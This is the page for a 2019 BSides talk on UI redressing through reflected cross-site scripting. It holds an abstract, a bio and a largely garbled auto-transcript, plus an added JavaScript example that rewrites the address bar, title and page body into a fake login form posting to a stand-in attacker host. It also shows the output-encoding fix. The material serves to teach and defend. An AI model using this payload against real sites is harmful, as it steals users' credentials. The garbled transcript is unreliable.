
BSidesKC 2019 - Travis Lowe - UI Redressing, Moving Beyond alert('xss')

BSides KC · 16:09 · 56 views · Published 2019-06
About this talk
Most people know all about making an alert box pop or getting a cookie sent to an external site with document.cookie. It makes sense: it is easy to demo and for the most part makes for a great proof of concept. Unfortunately these sometimes fail to showcase some of the more potentially devious outcomes of having a site that is vulnerable to XSS. Come hang out while we talk about one of these devious methods, called UI redressing, and how best to mitigate the issue.

Travis Lowe

Travis is recognized with an official certification from Microsoft as a Microsoft Office User Specialist in Microsoft Access 2000. He has worked in security for ~10 years, loves it, and has recently been digging into all things identity. During his day to day he is a penetration tester for a largish organization based out of Wichita.
Transcript [en]

Maybe all work. We're nearing the end of this journey of sessions. I appreciate, appreciate you all hanging out here on a beautiful Saturday. Introducing Travis Lowe, these, these all things Microsoft apparently, that's a fantastic, in security for about ten years.

So today we're gonna talk about tricking us.

You have an axe.

Cross-site scripting, the UI redressing. We really need, but it's really dangerous, but that's where it, in my opinion, really should be. But maybe you come across the site that has a cross-site scripting with new entrance brochures, there's no login, there's no request to be made like that, the process doesn't make sense. So I like telling stories.

We've done the story that I tell, the narrative that I could tell, that that is, I love, it's really important people react to it. This comes into play because, you know, in the woodbox finding, you know, what does that be, no one's gonna really connect what that means. document.cookie, sure, if you know, you don't have to, the session protected by, you only, sure that that could be dire, we can show that, but you're in an order box.

Swissky's repo, PayloadsAllTheThings, and I came across the tiny snippet here for UI redressing, and it was just a script thing here, never seen it before, I was like huh, what's that?

So HTML5 gives these two wonderful things: history.replaceState and history.pushState. So what they do is, in practice, the history.replaceState, and you normal, and you that slash slash slash slash, three of those, URL, stop sucking each is like, correctly reversal, you're just swinging it all the way back after, really, the website, in taking blog, Biersack blog. In a real world the reason this is used is to almost like a little placeholder. So if you had a gallery website, like images like that, you're putting all these photos, they can change your URL up on the top, that'd be, so we had like the DC Universe, yeah, picture Batman, with Batman became, to do or say Batman,

Joker, Joker, just better user experience perhaps. So if you have a trip text

stated a little bit, I say uploading it, not even entirely URL encoding it, we're gonna stick. So we better do what we do second. So we've got demoed up. BSides, when we've got warm up.


Alright, alright, there's gonna be a sign-in form, parent, you know, so down here you see you in, yeah, it's almost like, this really simple, there's no security here whatsoever.

All right, so we've got sickening pair and better strip here, no, no, no login, and we just remember URL bar, like lovely. So from a phishing standpoint this is really anything, because you just rewritten as the show logins, did you know, whatever.

Weird because this page doesn't, you, it won't work because it doesn't exist. So it's kind of a tent over your quad light space that you're in, because you are technically just on the user but there's nothing that really exists anywhere. You Simon Donald, all right.

For you, so you do that in the parameters, the title, the title parameter allows title page. So we've got you, your URL, we change the title, holiness, and then the browsers for you, so it's there, maybe it'll work, maybe you want in your element to be, some limitations with it, it's worth

That's kind of all, but all right. So document.body.innerHTML, you know, this is just standard JavaScript. What we can do, we can take the document website body tag, their HTML, right, do whatever we want. So we can take our script tag here and say, doc, why are you here, sinner, please login. When we pair here, replaceState, we now have two things combined and you completely rewritten the website.

The type of UI redressing at work for a long time.

All right, so back here.

We were a little, now we haven't gone yet.

Now three, you guys, name would have BSides login, login for, just like that. Imagine if you just style this, match the same thing, certificate, a giant group of URL which, this your house, when I pulled off a wire terrible real URL. So do all the people who don't use for a living, we've trained in the look the URL here, but he required sometimes, my compartment degrading.

So this is an email that you get, that simple link, which we already talked about.

Slash, dash, here, the one-time email, it's just a simple catcher that does a meta refresh. I caused it and slowed it down, just standard.


But we've got one which makes it a legitimate URL, anything about the regular people look into, regularly, basically everyone not us. You come into things when they go to page, we're gonna text your tickets out, they're gonna look for the .com, it seems that, oh honestly, that's what I'm gonna check for, and if it looks like a login, talk through some other perform problems and gave me to walk in, or sign into Gmail or sign in with Facebook, yeah, network, you know. Telling that story to be scary because this is just reflected cross-site scripting, it's not prepared anything else to read, the word box, whoo, but we're taking in the word box by the

entire website. So there's everything cross-site scripting which is easier because really hard, every time I go to go off site, go through evasions, I learned something new that I, along, and there's always a

Everyone, reach me, I'm on Twitter. Questions?

No.

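The chain the talk walks through, as an added example that is not the talk's own demo code: history.replaceState and document.title forge the address bar and tab, document.body.innerHTML swaps in a fake login form, and all of it runs on the victim's real origin because a reflected parameter is copied into the page unencoded. The function names, the victim.example and attacker.example hosts, the sample payload and the fake window object are assumptions constructed for this example so that it runs in Node; in a browser the same uiRedress call would be made against the real window.

```javascript
// Added example (not the talk's demo code): the UI-redressing payload the talk
// describes, the reflection that lets it run, and the output-encoding fix.
// Assumptions: the function names, the victim.example / attacker.example hosts,
// the sample payload and the fake window object below are constructed for this
// example so it runs outside a browser.

// 1. The payload. Three ordinary browser APIs, combined on a trusted origin:
//    history.replaceState(state, title, url)  rewrites the address bar,
//    document.title                           rewrites the tab title,
//    document.body.innerHTML                  replaces the visible page.
function uiRedress(win, fakePath, fakeTitle, fakeBodyHtml) {
  // replaceState only accepts same-origin URLs, which is the whole trick:
  // the address bar keeps showing the victim's real domain over attacker content.
  win.history.replaceState(null, '', fakePath);
  win.document.title = fakeTitle;
  win.document.body.innerHTML = fakeBodyHtml;
  return win.location.href;
}

// 2. The bug: a query parameter copied straight into HTML (reflected XSS).
function renderGreetingVulnerable(name) {
  return '<h1>Hello ' + name + '</h1>';
}

// 3. The fix: contextual output encoding for an HTML text context.
//    (A Content-Security-Policy whose script-src omits 'unsafe-inline' would
//    additionally block the injected inline <script> if an encoding is missed.)
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
function renderGreetingSafe(name) {
  return '<h1>Hello ' + escapeHtml(name) + '</h1>';
}

// Fake login page the attacker injects; the form posts to an attacker host (constructed).
const FAKE_LOGIN = '<h1>Session expired, please sign in</h1>' +
  '<form method="post" action="https://attacker.example/collect">' +
  '<input name="user"><input name="pass" type="password"><button>Sign in</button></form>';

// The reflected value as it would travel in the ?name= parameter (constructed).
const REFLECTED_PAYLOAD =
  '<script>history.replaceState(null,"","/login");document.title="Sign in";' +
  'document.body.innerHTML=' + JSON.stringify(FAKE_LOGIN) + '</script>';

// Minimal stand-in for window/document/history, enough to show the effect in Node.
function makeFakeWindow(origin, path) {
  const win = {
    location: { origin, href: origin + path },
    document: { title: 'Greeting', body: { innerHTML: '<h1>Hello</h1>' } },
  };
  win.history = {
    replaceState(_state, _title, url) {
      const target = new URL(url, win.location.href);
      // Browsers throw SecurityError for a different origin; same restriction here.
      if (target.origin !== origin) throw new Error('SecurityError: cross-origin URL');
      win.location.href = target.href;
    },
  };
  return win;
}

// Run the whole chain against the fake window and report what the victim would see.
function demo() {
  const win = makeFakeWindow('https://victim.example', '/greet?name=x');
  const href = uiRedress(win, '/login', 'Sign in', FAKE_LOGIN);
  return {
    href,                                  // https://victim.example/login
    title: win.document.title,             // Sign in
    body: win.document.body.innerHTML,     // the attacker's form
    vulnerable: renderGreetingVulnerable(REFLECTED_PAYLOAD),  // live <script> in the page
    safe: renderGreetingSafe(REFLECTED_PAYLOAD),              // script rendered as inert text
  };
}

console.log(demo());
```

Run it with node: the path and title change while the origin stays the victim's, which is why the same-origin restriction on replaceState helps the attacker rather than the defender. Encoding the reflected value turns the payload into inert text; a Content-Security-Policy whose script-src omits 'unsafe-inline' is the backstop if an encoding is missed.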